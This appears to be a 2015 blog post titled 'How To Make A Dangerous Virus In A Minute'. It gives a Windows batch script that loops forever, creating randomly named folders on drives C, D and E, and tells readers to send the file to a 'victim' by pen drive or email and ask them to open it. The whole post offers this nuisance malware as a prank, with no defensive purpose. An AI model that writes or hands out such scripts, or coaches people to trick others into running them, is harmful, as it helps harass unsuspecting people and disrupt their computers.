Monday 26 October 2015

How To Make A Dangerous Virus In A Minute

How to Create a Virus

Have you ever wished you could create your own virus, either for your own learning or as a prank? Virus creation takes time and knowledge, but anyone can do it if they put their mind to it. Creating a virus can teach you a lot about how a programming language works, as well as operating system and network security. See Step 1 below to get started.

Here we are going to show, How to make Simple Virus in notepad.

Like our Facebook Page : http://www.facebook.com/hackingchahru

Step 1 : We will Create a Virus


Step 2 : We will Check it on Victims Computer.


[ Note : Don't try it on your computer ]

Step 1: Open Notepad and Copy the Following code in Notepad.

 

Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in


Step 2: Give it to Victim

 Now Give this file to Victim via Pen-drive or Mail then ask to Open it.

It will Create More Folder in C,D,and E drive.

If you find any problem , just comment below

 

 

Previous Post
Next Post

Hi, I'm Gaurav Thakur. I'm the proud owner of PahadiGeeks. I've interest in tech since childhood. So, I thought to why not share my knowledge with you guys. This gives birth to our blog, PahadiGeeks.com

0 comments: